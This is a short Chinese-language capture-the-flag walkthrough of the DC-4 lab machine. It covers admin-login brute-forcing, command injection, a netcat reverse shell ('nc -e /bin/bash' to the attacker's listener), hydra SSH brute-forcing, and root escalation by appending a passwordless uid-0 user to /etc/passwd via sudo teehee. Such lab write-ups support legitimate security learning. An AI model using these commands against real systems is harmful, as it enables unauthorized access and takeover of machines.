靶机渗透DC-4

拿来就给出一个网站，其他的啥也没给。

最初想法是御剑扫描一下，但是发现也没什么有用的信息，还是只有一个管理登录框。

那就爆破吧······

成功爆到一个密码。

（Ps:平时要积累字典啊，用的时候现去找的·····）

登陆后台。

发现可以进行命令执行，抓包看看。

这里可以利用啊。执行个whoami看看。

可以执行。

接下来使用nc监听反弹shell。

nc -lnvp 444
nc -e /bin/bash 192.168.70.154 444

然后在目录里翻翻。在home目录里看到两个用户。在jim的用户目录里找到了密码的线索。

然后hydra爆破

hydra -l jim -P jim.txt ssh://192.168.70.158

成功爆到密码。

SSH登陆账户。

随便看看。

呦，mbox是root用户发来的。

看了下test.sh.

继续翻目录，在var/mails目录下找到了jim文件，查看。

是charles发给jim的信息，透露了Password。

直接切换到charles用户。

sudo -l看看。

哎嘿，出来了路径。

teehee -help发现-a命令执行命令追加文件内容，不用进行覆盖。

echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

用户名-hack
是否有密码—空
uid—0——root权限
用户信息记录位置—空
家目录—空
登录的命令解释器–/bin/bash

直接su hack，不用密码即可登陆，直接是root权限。cat flag即可。

这一关卡在于最后的teehee追加文件内容。